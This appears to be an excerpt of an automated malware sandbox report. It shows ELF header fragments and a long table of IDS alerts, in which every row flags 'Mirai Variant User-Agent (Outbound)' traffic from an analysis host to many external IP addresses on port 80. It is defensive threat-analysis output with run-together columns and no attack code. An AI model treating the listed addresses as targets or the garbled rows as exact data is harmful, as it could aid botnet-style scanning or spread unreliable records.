                                                      LOAD0x191540x4591540x4591540x6b40xa1c4.06700x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                      Download Network PCAP: filteredfull

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.1595.68.11.20059206802839471 02/14/24-09:30:11.643542TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5920680192.168.2.1595.68.11.200
                                                      192.168.2.15112.166.212.5552944802839471 02/14/24-09:28:49.299902TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5294480192.168.2.15112.166.212.55
                                                      192.168.2.1595.211.247.16432972802839471 02/14/24-09:29:38.517012TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3297280192.168.2.1595.211.247.164
                                                      192.168.2.1595.100.100.7049146802839471 02/14/24-09:30:31.545066TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4914680192.168.2.1595.100.100.70
                                                      192.168.2.1595.163.141.10035438802839471 02/14/24-09:29:19.037392TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3543880192.168.2.1595.163.141.100
                                                      192.168.2.15112.167.244.20459956802839471 02/14/24-09:30:34.346873TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5995680192.168.2.15112.167.244.204
                                                      192.168.2.15112.121.179.13460588802839471 02/14/24-09:30:29.619568TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6058880192.168.2.15112.121.179.134
                                                      192.168.2.1595.101.253.21057328802839471 02/14/24-09:30:31.536430TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5732880192.168.2.1595.101.253.210
                                                      192.168.2.1595.167.23.1745826802839471 02/14/24-09:30:43.761363TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4582680192.168.2.1595.167.23.17
                                                      192.168.2.1588.221.105.18538792802839471 02/14/24-09:30:16.578437TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3879280192.168.2.1588.221.105.185
                                                      192.168.2.1595.43.199.25060442802839471 02/14/24-09:29:13.571891TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6044280192.168.2.1595.43.199.250
                                                      192.168.2.1595.100.185.22839508802839471 02/14/24-09:30:59.656689TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3950880192.168.2.1595.100.185.228
                                                      192.168.2.1595.101.187.6148162802839471 02/14/24-09:29:35.282739TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4816280192.168.2.1595.101.187.61
                                                      192.168.2.1595.110.224.25060494802839471 02/14/24-09:29:05.609109TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6049480192.168.2.1595.110.224.250
                                                      192.168.2.1595.49.0.20857094802839471 02/14/24-09:29:08.989994TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5709480192.168.2.1595.49.0.208
                                                      192.168.2.15112.85.242.20144192802839471 02/14/24-09:30:09.286325TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4419280192.168.2.15112.85.242.201
                                                      192.168.2.1595.141.128.20050714802839471 02/14/24-09:29:05.664029TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5071480192.168.2.1595.141.128.200
                                                      192.168.2.1595.86.78.14654268802839471 02/14/24-09:28:47.616648TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5426880192.168.2.1595.86.78.146
                                                      192.168.2.1595.101.214.3556312802839471 02/14/24-09:30:21.588243TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5631280192.168.2.1595.101.214.35
                                                      192.168.2.1588.212.252.12049512802839471 02/14/24-09:31:16.444367TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4951280192.168.2.1588.212.252.120
                                                      192.168.2.1595.153.253.4558916802839471 02/14/24-09:29:08.781543TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5891680192.168.2.1595.153.253.45
                                                      192.168.2.1595.244.58.8333966802839471 02/14/24-09:30:44.630447TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3396680192.168.2.1595.244.58.83
                                                      192.168.2.1595.142.121.3434276802839471 02/14/24-09:30:11.623507TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3427680192.168.2.1595.142.121.34
                                                      192.168.2.1588.220.84.18660332802839471 02/14/24-09:29:19.501376TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6033280192.168.2.1588.220.84.186
                                                      192.168.2.1595.81.32.4139368802839471 02/14/24-09:30:52.951399TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3936880192.168.2.1595.81.32.41
                                                      192.168.2.15112.83.36.6245420802839471 02/14/24-09:30:36.982645TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4542080192.168.2.15112.83.36.62
                                                      192.168.2.1595.100.51.15049448802839471 02/14/24-09:29:56.731548TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4944880192.168.2.1595.100.51.150
                                                      192.168.2.15112.45.120.18759888802839471 02/14/24-09:29:22.117430TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5988880192.168.2.15112.45.120.187
                                                      192.168.2.15112.45.120.18759886802839471 02/14/24-09:29:22.114845TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5988680192.168.2.15112.45.120.187
                                                      192.168.2.15112.74.103.11151472802839471 02/14/24-09:29:01.726292TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5147280192.168.2.15112.74.103.111
                                                      192.168.2.1595.58.75.22149394802839471 02/14/24-09:29:19.100236TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4939480192.168.2.1595.58.75.221
                                                      192.168.2.1588.174.163.10660954802839471 02/14/24-09:30:19.606172TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6095480192.168.2.1588.174.163.106
                                                      192.168.2.1588.150.154.8943550802839471 02/14/24-09:29:40.557095TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4355080192.168.2.1588.150.154.89
                                                      192.168.2.1595.79.128.16557886802839471 02/14/24-09:28:56.086124TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5788680192.168.2.1595.79.128.165
                                                      192.168.2.1588.221.230.14442514802839471 02/14/24-09:30:08.380688TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4251480192.168.2.1588.221.230.144
                                                      192.168.2.1595.181.231.22646230802839471 02/14/24-09:30:53.105817TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4623080192.168.2.1595.181.231.226
                                                      192.168.2.1595.58.114.13949862802839471 02/14/24-09:30:24.552039TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4986280192.168.2.1595.58.114.139
                                                      192.168.2.1595.141.36.14636812802839471 02/14/24-09:29:38.534025TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3681280192.168.2.1595.141.36.146
                                                      192.168.2.1595.181.203.4443532802839471 02/14/24-09:29:08.750037TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4353280192.168.2.1595.181.203.44
                                                      192.168.2.1595.42.29.20150536802839471 02/14/24-09:30:59.704800TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5053680192.168.2.1595.42.29.201
                                                      192.168.2.1595.216.175.5938118802839471 02/14/24-09:30:33.984536TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3811880192.168.2.1595.216.175.59
                                                      192.168.2.1588.216.129.12251042802839471 02/14/24-09:30:00.863592TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5104280192.168.2.1588.216.129.122
                                                      192.168.2.1595.100.53.4955624802839471 02/14/24-09:28:57.744321TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5562480192.168.2.1595.100.53.49
                                                      192.168.2.1595.101.14.8657698802839471 02/14/24-09:29:35.314523TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5769880192.168.2.1595.101.14.86
                                                      192.168.2.1595.84.249.5746630802839471 02/14/24-09:30:37.298135TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4663080192.168.2.1595.84.249.57
                                                      192.168.2.1595.211.60.13055122802839471 02/14/24-09:30:14.130736TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5512280192.168.2.1595.211.60.130
                                                      192.168.2.1595.217.7.13544636802839471 02/14/24-09:30:59.698562TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4463680192.168.2.1595.217.7.135
                                                      192.168.2.1588.198.147.17440722802839471 02/14/24-09:29:15.463004TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4072280192.168.2.1588.198.147.174
                                                      192.168.2.1595.181.129.22056122802839471 02/14/24-09:30:19.657488TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5612280192.168.2.1595.181.129.220
                                                      192.168.2.1595.215.140.734720802839471 02/14/24-09:30:52.968460TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3472080192.168.2.1595.215.140.7
                                                      192.168.2.15112.186.20.3859798802839471 02/14/24-09:30:59.252997TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5979880192.168.2.15112.186.20.38
                                                      192.168.2.15112.187.12.11156622802839471 02/14/24-09:31:20.467140TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5662280192.168.2.15112.187.12.111
                                                      192.168.2.1595.101.16.15158734802839471 02/14/24-09:29:56.519559TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5873480192.168.2.1595.101.16.151
                                                      192.168.2.1595.85.210.22436270802839471 02/14/24-09:30:48.374166TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3627080192.168.2.1595.85.210.224
                                                      192.168.2.1595.111.218.6334790802839471 02/14/24-09:28:47.699644TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3479080192.168.2.1595.111.218.63
                                                      192.168.2.1595.86.82.147552802839471 02/14/24-09:30:24.722511TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4755280192.168.2.1595.86.82.1
                                                      192.168.2.1595.217.25.15034422802839471 02/14/24-09:29:42.750446TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3442280192.168.2.1595.217.25.150
                                                      192.168.2.15112.165.98.5937194802839471 02/14/24-09:30:37.753827TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3719480192.168.2.15112.165.98.59
                                                      192.168.2.1595.58.76.15736418802839471 02/14/24-09:28:47.692129TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3641880192.168.2.1595.58.76.157
                                                      192.168.2.1595.101.142.19459116802839471 02/14/24-09:29:05.592924TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5911680192.168.2.1595.101.142.194
                                                      192.168.2.1595.100.251.10742384802839471 02/14/24-09:29:09.708497TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4238480192.168.2.1595.100.251.107
                                                      192.168.2.1595.100.245.13147714802839471 02/14/24-09:30:50.491498TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4771480192.168.2.1595.100.245.131
                                                      192.168.2.1595.101.3.19146918802839471 02/14/24-09:29:24.633960TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4691880192.168.2.1595.101.3.191
                                                      192.168.2.1595.158.244.2936510802839471 02/14/24-09:29:29.717200TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3651080192.168.2.1595.158.244.29
                                                      192.168.2.1595.166.153.20150462802839471 02/14/24-09:29:29.687043TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5046280192.168.2.1595.166.153.201
                                                      192.168.2.15112.127.183.25356418802839471 02/14/24-09:31:05.847533TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5641880192.168.2.15112.127.183.253
                                                      192.168.2.1595.73.170.17547280802839471 02/14/24-09:28:55.841909TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4728080192.168.2.1595.73.170.175
                                                      192.168.2.1595.164.62.16746354802839471 02/14/24-09:30:53.678962TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4635480192.168.2.1595.164.62.167
                                                      192.168.2.15112.223.39.2933812802839471 02/14/24-09:28:47.093985TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3381280192.168.2.15112.223.39.29
                                                      192.168.2.15112.74.18.10633192802839471 02/14/24-09:29:54.963770TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3319280192.168.2.15112.74.18.106
                                                      192.168.2.1595.143.149.19359914802839471 02/14/24-09:29:57.053016TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5991480192.168.2.1595.143.149.193
                                                      192.168.2.15112.185.157.9047802802839471 02/14/24-09:30:13.949038TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4780280192.168.2.15112.185.157.90
                                                      192.168.2.15112.126.92.4752440802839471 02/14/24-09:31:12.841885TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5244080192.168.2.15112.126.92.47
                                                      192.168.2.15112.222.35.15840938802839471 02/14/24-09:29:48.338599TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4093880192.168.2.15112.222.35.158
                                                      192.168.2.15112.200.187.951780802839471 02/14/24-09:29:27.149485TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5178080192.168.2.15112.200.187.9
                                                      192.168.2.1595.127.222.12157020802839471 02/14/24-09:29:40.613939TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5702080192.168.2.1595.127.222.121
                                                      192.168.2.1595.134.64.16355098802839471 02/14/24-09:30:37.227998TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5509880192.168.2.1595.134.64.163
                                                      192.168.2.1595.59.137.356688802839471 02/14/24-09:29:46.521625TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5668880192.168.2.1595.59.137.3
                                                      192.168.2.1595.216.114.3251392802839471 02/14/24-09:29:05.609447TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5139280192.168.2.1595.216.114.32
                                                      192.168.2.1595.168.78.359198802839471 02/14/24-09:30:23.896672TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5919880192.168.2.1595.168.78.3
                                                      192.168.2.15112.186.20.3859690802839471 02/14/24-09:30:55.205815TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5969080192.168.2.15112.186.20.38
                                                      192.168.2.1595.101.181.5339168802839471 02/14/24-09:29:54.450278TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3916880192.168.2.1595.101.181.53
                                                      192.168.2.1595.141.251.24936532802839471 02/14/24-09:31:09.838797TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3653280192.168.2.1595.141.251.249
                                                      192.168.2.1595.101.47.9135212802839471 02/14/24-09:29:24.641128TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3521280192.168.2.1595.101.47.91
                                                      192.168.2.15112.171.68.22752590802839471 02/14/24-09:30:03.879540TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5259080192.168.2.15112.171.68.227
                                                      192.168.2.15112.47.11.21053568802839471 02/14/24-09:29:03.983740TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5356880192.168.2.15112.47.11.210
                                                      192.168.2.1595.255.93.9242718802839471 02/14/24-09:29:05.627978TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4271880192.168.2.1595.255.93.92
                                                      192.168.2.1595.59.121.5345162802839471 02/14/24-09:29:40.401154TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4516280192.168.2.1595.59.121.53
                                                      192.168.2.1595.7.114.10339656802839471 02/14/24-09:30:43.784052TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3965680192.168.2.1595.7.114.103
                                                      192.168.2.15112.74.127.2247730802839471 02/14/24-09:29:00.314833TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4773080192.168.2.15112.74.127.22
                                                      192.168.2.1588.218.158.21359270802839471 02/14/24-09:29:33.853105TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5927080192.168.2.1588.218.158.213
                                                      192.168.2.1595.59.243.12938848802839471 02/14/24-09:30:48.161309TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3884880192.168.2.1595.59.243.129
                                                      192.168.2.1595.100.190.3637162802839471 02/14/24-09:31:17.689597TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3716280192.168.2.1595.100.190.36
                                                      192.168.2.1595.100.185.3740640802839471 02/14/24-09:29:15.504414TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4064080192.168.2.1595.100.185.37
                                                      192.168.2.1595.216.6.2636432802839471 02/14/24-09:30:29.841357TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3643280192.168.2.1595.216.6.26
                                                      192.168.2.1595.101.88.18635044802839471 02/14/24-09:30:43.733535TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3504480192.168.2.1595.101.88.186
                                                      192.168.2.1588.99.168.21236206802839471 02/14/24-09:30:31.339860TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3620680192.168.2.1588.99.168.212
                                                      192.168.2.15112.135.219.6851420802839471 02/14/24-09:29:00.287610TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5142080192.168.2.15112.135.219.68
                                                      192.168.2.1595.100.179.11447876802839471 02/14/24-09:30:48.091961TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4787680192.168.2.1595.100.179.114
                                                      192.168.2.15112.25.57.4354646802839471 02/14/24-09:31:02.778009TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5464680192.168.2.15112.25.57.43
                                                      192.168.2.1595.216.127.24942706802839471 02/14/24-09:29:57.507595TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4270680192.168.2.1595.216.127.249
                                                      192.168.2.15112.184.60.5138690802839471 02/14/24-09:29:03.705439TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3869080192.168.2.15112.184.60.51
                                                      192.168.2.1595.58.54.9239562802839471 02/14/24-09:30:24.760817TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3956280192.168.2.1595.58.54.92
                                                      192.168.2.1595.101.149.14956100802839471 02/14/24-09:30:37.193296TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5610080192.168.2.1595.101.149.149
                                                      192.168.2.1595.128.42.20250708802839471 02/14/24-09:30:06.424087TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5070880192.168.2.1595.128.42.202
                                                      192.168.2.1595.164.22.1036698802839471 02/14/24-09:30:59.771528TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3669880192.168.2.1595.164.22.10
                                                      192.168.2.1595.164.1.12654004802839471 02/14/24-09:30:11.615893TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5400480192.168.2.1595.164.1.126
                                                      192.168.2.1595.101.70.2356420802839471 02/14/24-09:31:13.059367TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5642080192.168.2.1595.101.70.23
                                                      192.168.2.1595.86.102.4056872802839471 02/14/24-09:30:14.786063TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5687280192.168.2.1595.86.102.40
                                                      192.168.2.1595.240.204.19436554802839471 02/14/24-09:31:13.069495TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3655480192.168.2.1595.240.204.194
                                                      192.168.2.1595.216.18.10151720802839471 02/14/24-09:29:56.523011TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5172080192.168.2.1595.216.18.101
                                                      192.168.2.1595.57.101.21447620802839471 02/14/24-09:30:48.588020TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4762080192.168.2.1595.57.101.214
                                                      192.168.2.1588.28.177.6441816802839471 02/14/24-09:30:16.641450TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4181680192.168.2.1588.28.177.64
                                                      192.168.2.1595.181.228.16439936802839471 02/14/24-09:30:06.794584TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3993680192.168.2.1595.181.228.164
                                                      192.168.2.1595.111.232.9350378802839471 02/14/24-09:29:33.432165TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5037880192.168.2.1595.111.232.93
                                                      192.168.2.1595.100.189.2548516802839471 02/14/24-09:29:51.661319TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4851680192.168.2.1595.100.189.25
                                                      192.168.2.1595.217.150.10844132802839471 02/14/24-09:29:56.522497TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4413280192.168.2.1595.217.150.108
                                                      192.168.2.1595.101.19.6344014802839471 02/14/24-09:29:56.521559TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4401480192.168.2.1595.101.19.63
                                                      192.168.2.1595.216.123.18251872802839471 02/14/24-09:29:56.764313TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5187280192.168.2.1595.216.123.182
                                                      192.168.2.1588.221.226.6455164802839471 02/14/24-09:30:00.960733TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5516480192.168.2.1588.221.226.64
                                                      192.168.2.1595.100.53.4955572802839471 02/14/24-09:28:56.050828TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5557280192.168.2.1595.100.53.49
                                                      192.168.2.1588.84.219.10350440802839471 02/14/24-09:30:19.190524TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5044080192.168.2.1588.84.219.103
                                                      192.168.2.15112.213.32.23832960802839471 02/14/24-09:30:08.906175TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3296080192.168.2.15112.213.32.238
                                                      192.168.2.1595.216.204.25436962802839471 02/14/24-09:29:19.025452TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3696280192.168.2.1595.216.204.254
                                                      192.168.2.1595.59.106.19255242802839471 02/14/24-09:30:34.062554TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5524280192.168.2.1595.59.106.192
                                                      192.168.2.1595.101.241.1259074802839471 02/14/24-09:30:14.533215TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5907480192.168.2.1595.101.241.12
                                                      192.168.2.1588.99.36.11951556802839471 02/14/24-09:30:06.226730TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5155680192.168.2.1588.99.36.119
                                                      192.168.2.1595.217.161.16951832802839471 02/14/24-09:30:24.692627TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5183280192.168.2.1595.217.161.169
                                                      192.168.2.1588.99.97.11639818802839471 02/14/24-09:30:19.609726TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3981880192.168.2.1588.99.97.116
                                                      192.168.2.15112.159.70.23836342802839471 02/14/24-09:29:22.049211TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3634280192.168.2.15112.159.70.238
                                                      192.168.2.1588.12.95.4536480802839471 02/14/24-09:29:31.793267TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3648080192.168.2.1588.12.95.45
                                                      192.168.2.15112.132.215.15345590802839471 02/14/24-09:29:48.351282TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4559080192.168.2.15112.132.215.153
                                                      192.168.2.1595.237.209.8143078802839471 02/14/24-09:31:06.734740TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4307880192.168.2.1595.237.209.81
                                                      192.168.2.1595.83.127.15438446802839471 02/14/24-09:31:13.699113TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3844680192.168.2.1595.83.127.154
                                                      192.168.2.1595.56.57.21048484802839471 02/14/24-09:29:33.513112TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4848480192.168.2.1595.56.57.210
                                                      192.168.2.1588.212.8.1259908802839471 02/14/24-09:31:16.432632TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5990880192.168.2.1588.212.8.12
                                                      192.168.2.15112.78.1.5734772802839471 02/14/24-09:29:01.019005TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3477280192.168.2.15112.78.1.57
                                                      192.168.2.1595.101.116.4852464802839471 02/14/24-09:29:08.916682TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5246480192.168.2.1595.101.116.48
                                                      192.168.2.1595.101.200.9745228802839471 02/14/24-09:29:51.448153TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4522880192.168.2.1595.101.200.97
                                                      192.168.2.15112.169.120.24251906802839471 02/14/24-09:28:49.299837TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5190680192.168.2.15112.169.120.242
                                                      192.168.2.15112.168.163.8042402802839471 02/14/24-09:30:10.668281TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4240280192.168.2.15112.168.163.80
                                                      192.168.2.1595.100.205.644980802839471 02/14/24-09:30:52.970267TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4498080192.168.2.1595.100.205.6
                                                      192.168.2.1595.217.237.3641208802839471 02/14/24-09:30:44.640108TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4120880192.168.2.1595.217.237.36
                                                      192.168.2.15112.74.32.15542252802839471 02/14/24-09:29:22.833929TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4225280192.168.2.15112.74.32.155
                                                      192.168.2.1595.110.177.15035120802839471 02/14/24-09:30:11.637297TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3512080192.168.2.1595.110.177.150
                                                      192.168.2.1595.217.203.25134672802839471 02/14/24-09:29:56.523072TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3467280192.168.2.1595.217.203.251
                                                      192.168.2.15112.180.15.8435190802839471 02/14/24-09:28:47.080473TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3519080192.168.2.15112.180.15.84
                                                      192.168.2.1595.217.16.10152880802839471 02/14/24-09:31:13.514224TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5288080192.168.2.1595.217.16.101
                                                      192.168.2.1595.86.125.8955130802839471 02/14/24-09:29:40.363153TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5513080192.168.2.1595.86.125.89
                                                      192.168.2.1588.221.180.11948634802839471 02/14/24-09:31:11.284539TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4863480192.168.2.1588.221.180.119
                                                      192.168.2.1595.214.235.22136028802839471 02/14/24-09:31:17.920887TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3602880192.168.2.1595.214.235.221
                                                      192.168.2.15112.60.15.22439526802839471 02/14/24-09:29:28.156474TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3952680192.168.2.15112.60.15.224
                                                      192.168.2.1595.101.221.6643204802839471 02/14/24-09:29:35.298891TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4320480192.168.2.1595.101.221.66
                                                      192.168.2.1595.143.181.9839556802839471 02/14/24-09:30:52.937642TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3955680192.168.2.1595.143.181.98
                                                      192.168.2.1595.217.183.14157652802839471 02/14/24-09:30:37.201439TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5765280192.168.2.1595.217.183.141
                                                      192.168.2.1595.100.127.1545086802839471 02/14/24-09:28:47.585598TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4508680192.168.2.1595.100.127.15
                                                      192.168.2.15112.105.38.9855688802839471 02/14/24-09:29:01.649846TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5568880192.168.2.15112.105.38.98
                                                      192.168.2.1595.42.211.5533254802839471 02/14/24-09:31:06.727203TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3325480192.168.2.1595.42.211.55
                                                      192.168.2.1595.56.20.1555822802839471 02/14/24-09:30:06.605735TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5582280192.168.2.1595.56.20.15
                                                      192.168.2.1595.101.203.21236494802839471 02/14/24-09:30:50.503021TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3649480192.168.2.1595.101.203.212
                                                      192.168.2.1595.0.142.18850632802839471 02/14/24-09:30:27.512422TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5063280192.168.2.1595.0.142.188
                                                      192.168.2.1595.101.41.16842310802839471 02/14/24-09:30:24.695697TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4231080192.168.2.1595.101.41.168
                                                      192.168.2.1595.170.82.19952622802839471 02/14/24-09:31:13.467215TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5262280192.168.2.1595.170.82.199
                                                      192.168.2.1588.218.138.4242472802839471 02/14/24-09:30:26.278524TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4247280192.168.2.1588.218.138.42
